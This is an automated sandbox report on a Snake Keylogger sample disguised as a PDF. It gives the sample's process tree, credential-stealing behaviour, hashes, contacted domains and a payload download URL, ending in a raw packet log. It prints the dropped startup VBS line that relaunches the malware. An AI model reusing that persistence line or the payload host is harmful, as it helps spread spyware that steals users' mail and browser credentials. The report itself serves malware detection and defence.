                Source: Yara match | File source: 0.2.File07098.PDF.exe.33d9550.1.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: Process Memory Space: File07098.PDF.exe PID: 4124, type: MEMORYSTR
                Source: Yara match | File source: Process Memory Space: InstallUtil.exe PID: 2460, type: MEMORYSTR
                Source: Yara match | File source: Process Memory Space: Current.exe PID: 528, type: MEMORYSTR
                Source: Yara match | File source: Process Memory Space: InstallUtil.exe PID: 6204, type: MEMORYSTR

                Techniques listed per tactic; a number in parentheses is the count shown with that technique in the matrix.
                Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies
                Resource Development: Scripting (111); Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless
                Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
                Execution: Scheduled Task/Job (1); Scheduled Task/Job; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job
                Persistence: Scripting (111); DLL Side-Loading (1); Scheduled Task/Job (1); Registry Run Keys / Startup Folder (2); Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
                Privilege Escalation: DLL Side-Loading (1); Process Injection (11); Scheduled Task/Job (1); Registry Run Keys / Startup Folder (2); Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
                Defense Evasion: Disable or Modify Tools (1); Deobfuscate/Decode Files or Information (1); Obfuscated Files or Information (12); Software Packing (2); DLL Side-Loading (1); Masquerading (11); Virtualization/Sandbox Evasion (31); Process Injection (11)
                Credential Access: OS Credential Dumping (1); LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
                Discovery: File and Directory Discovery (2); System Information Discovery (13); Query Registry (1); Security Software Discovery (21); Process Discovery (1); Virtualization/Sandbox Evasion (31); Application Window Discovery (1); System Network Configuration Discovery (1)
                Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services
                Collection: Archive Collected Data (11); Data from Local System (1); Email Collection (1); Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking
                Command and Control: Ingress Tool Transfer (1); Encrypted Channel (11); Non-Application Layer Protocol (2); Application Layer Protocol (13); Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol
                Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol
                Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement

                Behavior Graph ID: 1545174, Sample: File07098.PDF.exe, Startdate: 30/10/2024, Architecture: WINDOWS, Score: 100
                • Sample-level signatures: Found malware configuration; Malicious sample detected (through community Yara rule); Antivirus / Scanner detection for submitted sample; 14 other signatures
                • Sample-level domains: reallyfreegeoip.org (signature: Tries to detect the country of the analysis system (by using the IP)); checkip.dyndns.org; 2 other IPs or domains
                • File07098.PDF.exe (started): contacts erkasera.com 188.132.193.46, 443, 49704, 49724 PREMIERDC-VERI-MERKEZI-ANONIM-SIRKETIPREMIERDC-SHTR Turkey; drops C:\Users\user\AppData\Roaming\Current.exe (PE32), C:\Users\user\AppData\Roaming\...\Current.vbs (ASCII), C:\Users\user\...\Current.exe:Zone.Identifier (ASCII); signatures: Drops VBS files to the startup folder; Tries to detect sandboxes and other dynamic analysis tools (process name or module or function); starts InstallUtil.exe
                • InstallUtil.exe (started by File07098.PDF.exe): contacts reallyfreegeoip.org 188.114.96.3, 443, 49706, 49707 CLOUDFLARENETUS European Union and checkip.dyndns.com 193.122.130.0, 49705, 49708, 49710 ORACLE-BMC-31898US United States; signature: Tries to steal Mail credentials (via file / registry access)
                • wscript.exe (started): signature: Windows Scripting host queries suspicious COM object (likely to drop second stage); starts Current.exe
                • Current.exe (started by wscript.exe): signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file; starts InstallUtil.exe
                • InstallUtil.exe (started by Current.exe): signatures: Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc)

                | Source | Detection | Scanner | Label | Link |
                | File07098.PDF.exe | 63% | ReversingLabs | ByteCode-MSIL.Spyware.Snakekeylogger | |
                | File07098.PDF.exe | 100% | Avira | HEUR/AGEN.1323701 | |
                | File07098.PDF.exe | 100% | Joe Sandbox ML | | |

                | Source | Detection | Scanner | Label | Link |
                | C:\Users\user\AppData\Roaming\Current.exe | 100% | Avira | HEUR/AGEN.1323701 | |
                | C:\Users\user\AppData\Roaming\Current.exe | 100% | Joe Sandbox ML | | |
                | C:\Users\user\AppData\Roaming\Current.exe | 63% | ReversingLabs | ByteCode-MSIL.Spyware.Snakekeylogger | |

                No Antivirus matches
                No Antivirus matches

                | Source | Detection | Scanner | Label | Link |
                | http://checkip.dyndns.org/ | 0% | URL Reputation | safe | |
                | https://stackoverflow.com/q/14436606/23354 | 0% | URL Reputation | safe | |
                | https://stackoverflow.com/q/11564914/23354; | 0% | URL Reputation | safe | |
                | https://stackoverflow.com/q/2152978/23354 | 0% | URL Reputation | safe | |
                | http://checkip.dyndns.org/q | 0% | URL Reputation | safe | |
                | http://reallyfreegeoip.org | 0% | URL Reputation | safe | |
                | https://reallyfreegeoip.org | 0% | URL Reputation | safe | |
                | http://checkip.dyndns.org | 0% | URL Reputation | safe | |
                | http://checkip.dyndns.com | 0% | URL Reputation | safe | |
                | http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe | |
                | https://reallyfreegeoip.org/xml/ | 0% | URL Reputation | safe | |

                | Name | IP | Active | Malicious | Antivirus Detection | Reputation |
                | erkasera.com | 188.132.193.46 | true | false | | unknown |
                | reallyfreegeoip.org | 188.114.96.3 | true | true | | unknown |
                | checkip.dyndns.com | 193.122.130.0 | true | false | | unknown |
                | checkip.dyndns.org | unknown | unknown | true | | unknown |

                | Name | Malicious | Antivirus Detection | Reputation |
                | http://checkip.dyndns.org/ | false | URL Reputation: safe | unknown |
                | https://erkasera.com/seuias/Mccudidikm.vdf | false | | unknown |
                | https://reallyfreegeoip.org/xml/173.254.250.78 | false | | unknown |

                | Name | Source | Malicious | Antivirus Detection | Reputation |
                | https://reallyfreegeoip.org/xml/173.254.250.78$ | InstallUtil.exe | false | | unknown |
                | https://erkasera.com | File07098.PDF.exe, Current.exe | false | | unknown |
                | https://github.com/mgravell/protobuf-neti | File07098.PDF.exe | false | | unknown |
                | https://stackoverflow.com/q/14436606/23354 | File07098.PDF.exe, Current.exe | false | URL Reputation: safe | unknown |
                | https://github.com/mgravell/protobuf-netJ | File07098.PDF.exe | false | | unknown |
                | https://stackoverflow.com/q/11564914/23354; | File07098.PDF.exe | false | URL Reputation: safe | unknown |
                | https://stackoverflow.com/q/2152978/23354 | File07098.PDF.exe | false | URL Reputation: safe | unknown |
                | http://checkip.dyndns.org/q | File07098.PDF.exe, InstallUtil.exe, Current.exe | false | URL Reputation: safe | unknown |
                | http://reallyfreegeoip.org | InstallUtil.exe | false | URL Reputation: safe | unknown |
                | https://github.com/mgravell/protobuf-net | File07098.PDF.exe | false | | unknown |
                | https://reallyfreegeoip.org | InstallUtil.exe | false | URL Reputation: safe | unknown |
                | http://checkip.dyndns.org | InstallUtil.exe | false | URL Reputation: safe | unknown |
                | https://erkasera.com/seuias/Mccudidikm.vdfCpHB? | File07098.PDF.exe | false | | unknown |
                | http://checkip.dyndns.com | InstallUtil.exe | false | URL Reputation: safe | unknown |
                | https://erkasera.com/seuias/Mccudidikm.vdfC | Current.exe | false | | unknown |
                | http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | File07098.PDF.exe, InstallUtil.exe, Current.exe | false | URL Reputation: safe | unknown |
                | https://reallyfreegeoip.org/xml/ | File07098.PDF.exe, InstallUtil.exe, Current.exe | false |
                                          • URL Reputation: safe
                                          unknown
IP | Domain | Country | ASN | ASN Name | Malicious
188.132.193.46 | erkasera.com | Turkey | 42910 | PREMIERDC-VERI-MERKEZI-ANONIM-SIRKETIPREMIERDC-SHTR | false
188.114.96.3 | reallyfreegeoip.org | European Union | 13335 | CLOUDFLARENETUS | true
193.122.130.0 | checkip.dyndns.com | United States | 31898 | ORACLE-BMC-31898US | false
                                          Joe Sandbox version:41.0.0 Charoite
                                          Analysis ID:1545174
                                          Start date and time:2024-10-30 07:56:41 +01:00
                                          Joe Sandbox product:CloudBasic
                                          Overall analysis duration:0h 9m 30s
                                          Hypervisor based Inspection enabled:false
                                          Report type:full
                                          Cookbook file name:default.jbs
                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                          Number of analysed new started processes analysed:9
                                          Number of new started drivers analysed:0
                                          Number of existing processes analysed:0
                                          Number of existing drivers analysed:0
                                          Number of injected processes analysed:0
                                          Technologies:
                                          • HCA enabled
                                          • EGA enabled
                                          • AMSI enabled
                                          Analysis Mode:default
                                          Analysis stop reason:Timeout
                                          Sample name:File07098.PDF.exe
                                          Detection:MAL
                                          Classification:mal100.troj.spyw.expl.evad.winEXE@8/3@3/3
                                          EGA Information:
                                          • Successful, ratio: 25%
                                          HCA Information:
                                          • Successful, ratio: 97%
                                          • Number of executed functions: 479
                                          • Number of non-executed functions: 37
                                          Cookbook Comments:
                                          • Found application associated with file extension: .exe
                                          • Override analysis time to 240000 for current running targets taking high CPU consumption
                                          • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                          • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                          • Execution Graph export aborted for target Current.exe, PID 528 because it is empty
                                          • Execution Graph export aborted for target File07098.PDF.exe, PID 4124 because it is empty
                                          • Execution Graph export aborted for target InstallUtil.exe, PID 2460 because it is empty
                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                          • Report size exceeded maximum capacity and may have missing disassembly code.
                                          • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                          • Report size getting too big, too many NtReadVirtualMemory calls found.
                                          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                          • VT rate limit hit for: File07098.PDF.exe
Time | Type | Description
02:57:29 | API Interceptor | 33x Sleep call for process: File07098.PDF.exe modified
02:57:37 | API Interceptor | 13358773x Sleep call for process: InstallUtil.exe modified
02:57:48 | API Interceptor | 31x Sleep call for process: Current.exe modified
07:57:39 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Current.vbs
                                                      Process:C:\Users\user\Desktop\File07098.PDF.exe
                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):130048
                                                      Entropy (8bit):5.824076507922611
                                                      Encrypted:false
                                                      SSDEEP:3072:BF61vQyyaKGQlGTpIHHbOrWvmLIs3ap9LUHv7ATxBG:BFe4EKGQlo93ap9IPET
                                                      MD5:71360D65665D164B175A5A73964E96EC
                                                      SHA1:4183950B0A17B9BE22E05088EA666EBB45815A13
                                                      SHA-256:F7679E885A80F2A9CFD8424891477ED8C77B4BE6CF05BFC85D6D9DD87E095730
                                                      SHA-512:0ADDB30D47684F2952705A8B224CF31AB49FF1B4D5E48824D152E3A957E098E5D09F66C13BA42D0188EF2DBFFC5B194DBA64425C2DF64259ABACFDA4C19EEE76
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: Avira, Detection: 100%
                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                      • Antivirus: ReversingLabs, Detection: 63%
                                                      Reputation:low
                                                      Process:C:\Users\user\Desktop\File07098.PDF.exe
                                                      File Type:ASCII text, with CRLF line terminators
                                                      Category:modified
                                                      Size (bytes):26
                                                      Entropy (8bit):3.95006375643621
                                                      Encrypted:false
                                                      SSDEEP:3:ggPYV:rPYV
                                                      MD5:187F488E27DB4AF347237FE461A079AD
                                                      SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                      SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                      SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                      Malicious:true
                                                      Reputation:high, very likely benign file
                                                      Preview:[ZoneTransfer]....ZoneId=0
                                                      Process:C:\Users\user\Desktop\File07098.PDF.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):83
                                                      Entropy (8bit):4.709822571002774
                                                      Encrypted:false
                                                      SSDEEP:3:FER/n0eFHHoUkh4EaKC5+kAHn:FER/lFHI9aZ5+JH
                                                      MD5:1CD09C4AC57571430505F1B81301A1CE
                                                      SHA1:480D837BC18F41ECD7C18EB6093C3FFB62567425
                                                      SHA-256:839A031287D8023A99CB9471E921E7E1E24EFFD01549D8A7372BD5B1E09903E2
                                                      SHA-512:449E16AE187E61833CC385D3681E35DBB4B969B6892F9945ADEF16F00DF6045D134EDF5B24499B438D597B31148419B50AF6E37C2047494C6A03C465DD881D94
                                                      Malicious:true
                                                      Reputation:low
                                                      Preview:CreateObject("WScript.Shell").Run """C:\Users\user\AppData\Roaming\Current.exe"""
                                                      File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Entropy (8bit):5.824076507922611
                                                      TrID:
                                                      • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                      • Win32 Executable (generic) a (10002005/4) 49.78%
                                                      • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                      • Generic Win/DOS Executable (2004/3) 0.01%
                                                      • DOS Executable Generic (2002/1) 0.01%
                                                      File name:File07098.PDF.exe
                                                      File size:130'048 bytes
                                                      MD5:71360d65665d164b175a5a73964e96ec
                                                      SHA1:4183950b0a17b9be22e05088ea666ebb45815a13
                                                      SHA256:f7679e885a80f2a9cfd8424891477ed8c77b4be6cf05bfc85d6d9dd87e095730
                                                      SHA512:0addb30d47684f2952705a8b224cf31ab49ff1b4d5e48824d152e3a957e098e5d09f66c13ba42d0188ef2dbffc5b194dba64425c2df64259abacfda4c19eee76
                                                      SSDEEP:3072:BF61vQyyaKGQlGTpIHHbOrWvmLIs3ap9LUHv7ATxBG:BFe4EKGQlo93ap9IPET
                                                      TLSH:37D3F81BBAAB45A1C38C677FC487140417ACC296B793E74A668E23F64447FB9ED0421F
                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..... g................................. ... ....@.. .......................`............`................................
                                                      Icon Hash:00928e8e8686b000
                                                      Entrypoint:0x4211ae
                                                      Entrypoint Section:.text
                                                      Digitally signed:false
                                                      Imagebase:0x400000
                                                      Subsystem:windows gui
                                                      Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                      DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                      Time Stamp:0x6720A302 [Tue Oct 29 08:55:30 2024 UTC]
                                                      TLS Callbacks:
                                                      CLR (.Net) Version:
                                                      OS Version Major:4
                                                      OS Version Minor:0
                                                      File Version Major:4
                                                      File Version Minor:0
                                                      Subsystem Version Major:4
                                                      Subsystem Version Minor:0
                                                      Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                      Instruction
                                                      jmp dword ptr [00402000h]
                                                      add byte ptr [eax], al
                                                      Name | Virtual Address | Virtual Size | Is in Section
                                                      IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                                      IMAGE_DIRECTORY_ENTRY_IMPORT | 0x21160 | 0x4b | .text
                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x22000 | 0x560 | .rsrc
                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                                      IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x24000 | 0xc | .reloc
                                                      IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                                      IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                                      IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
                                                      IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                                                      Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                                      .text | 0x2000 | 0x1f1b4 | 0x1f200 | 57c18b06a2757332bac191fd8a5bcf1f | False | 0.45260730421686746 | data | 5.860755674701272 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                      .rsrc | 0x22000 | 0x560 | 0x600 | 3e5ff1bf69cdd74e4028661615a21a44 | False | 0.4016927083333333 | data | 3.898030280104735 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                      .reloc | 0x24000 | 0xc | 0x200 | 47b0c31ec6e633a644b7d324071ad38b | False | 0.044921875 | data | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                      Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                                                      RT_VERSION | 0x220a0 | 0x30c | data |  |  | 0.4256410256410256
                                                      RT_MANIFEST | 0x223ac | 0x1b4 | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (433), with no line terminators |  |  | 0.5642201834862385
                                                      DLL | Import
                                                      mscoree.dll | _CorExeMain
                                                      Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
                                                      2024-10-30T07:57:37.356642+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.5 | 49705 | 193.122.130.0 | 80 | TCP
                                                      2024-10-30T07:57:38.466060+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.5 | 49705 | 193.122.130.0 | 80 | TCP
                                                      2024-10-30T07:57:39.186966+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.5 | 49707 | 188.114.96.3 | 443 | TCP
                                                      2024-10-30T07:57:39.903580+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.5 | 49708 | 193.122.130.0 | 80 | TCP
                                                      2024-10-30T07:57:43.541237+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.5 | 49713 | 188.114.96.3 | 443 | TCP
                                                      2024-10-30T07:57:55.747290+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.5 | 49750 | 193.122.130.0 | 80 | TCP
                                                      2024-10-30T07:57:56.950406+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.5 | 49750 | 193.122.130.0 | 80 | TCP
                                                      2024-10-30T07:57:57.641366+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.5 | 49765 | 188.114.96.3 | 443 | TCP
                                                      2024-10-30T07:57:58.356676+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.5 | 49767 | 193.122.130.0 | 80 | TCP
                                                      2024-10-30T07:58:00.538612+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.5 | 49785 | 188.114.96.3 | 443 | TCP
                                                      2024-10-30T07:58:03.651769+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.5 | 49804 | 188.114.96.3 | 443 | TCP
                                                      TimestampSource PortDest PortSource IPDest IP
                                                      Oct 30, 2024 07:57:33.522646904 CET49704443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:33.673084021 CET44349704188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:33.673135996 CET44349704188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:33.673202038 CET49704443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:33.673280001 CET44349704188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:33.673320055 CET49704443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:33.673343897 CET49704443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:33.673532009 CET44349704188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:33.673556089 CET44349704188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:33.673604965 CET49704443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:33.673618078 CET44349704188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:33.673646927 CET49704443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:33.673671007 CET49704443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:33.674158096 CET44349704188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:33.674182892 CET44349704188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:33.674232960 CET49704443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:33.674245119 CET44349704188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:33.674271107 CET49704443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:33.674288034 CET49704443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:33.674479961 CET44349704188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:33.674496889 CET44349704188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:33.674566984 CET49704443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:33.674581051 CET44349704188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:33.674633980 CET49704443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:33.674990892 CET44349704188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:33.675005913 CET44349704188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:33.675062895 CET49704443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:33.675076962 CET44349704188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:33.675133944 CET49704443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:33.825490952 CET44349704188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:33.825541019 CET44349704188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:33.825628042 CET49704443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:33.825654984 CET44349704188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:33.825673103 CET49704443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:33.825699091 CET49704443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:33.826055050 CET44349704188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:33.826088905 CET44349704188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:33.826131105 CET49704443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:33.826138020 CET44349704188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:33.826165915 CET49704443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:33.826186895 CET49704443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:33.826404095 CET44349704188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:33.826441050 CET44349704188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:33.826476097 CET49704443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:33.826482058 CET44349704188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:33.826512098 CET49704443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:33.826529980 CET49704443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:33.827028036 CET44349704188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:33.827064037 CET44349704188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:33.827105999 CET49704443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:33.827114105 CET44349704188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:33.827126980 CET49704443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:33.827148914 CET49704443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:33.827339888 CET44349704188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:33.827370882 CET44349704188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:33.827408075 CET49704443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:33.827414036 CET44349704188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:33.827429056 CET49704443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:33.827466965 CET49704443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:33.827645063 CET44349704188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:33.827685118 CET44349704188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:33.827718973 CET49704443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:33.827725887 CET44349704188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:33.827769995 CET49704443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:33.827769995 CET49704443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:33.978326082 CET44349704188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:33.978349924 CET44349704188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:33.978511095 CET49704443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:33.978537083 CET44349704188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:33.978579998 CET49704443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:33.978928089 CET44349704188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:33.978943110 CET44349704188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:33.979000092 CET49704443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:33.979007006 CET44349704188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:33.979043007 CET49704443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:33.979362011 CET44349704188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:33.979377985 CET44349704188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:33.979428053 CET49704443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:33.979435921 CET44349704188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:33.979458094 CET49704443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:33.979479074 CET49704443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:33.979782104 CET44349704188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:33.979796886 CET44349704188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:33.979846954 CET49704443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:33.979855061 CET44349704188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:33.979890108 CET49704443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:33.980266094 CET44349704188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:33.980282068 CET44349704188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:33.980346918 CET49704443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:33.980353117 CET44349704188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:33.980376959 CET49704443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:33.980395079 CET49704443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:33.980647087 CET44349704188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:33.980669022 CET44349704188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:33.980715036 CET49704443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:33.980720043 CET44349704188.132.193.46192.168.2.5
                                                      Oct 30, 2024 07:57:33.980752945 CET49704443192.168.2.5188.132.193.46
                                                      Oct 30, 2024 07:57:34.131182909 CET44349704188.132.193.46192.168.2.5
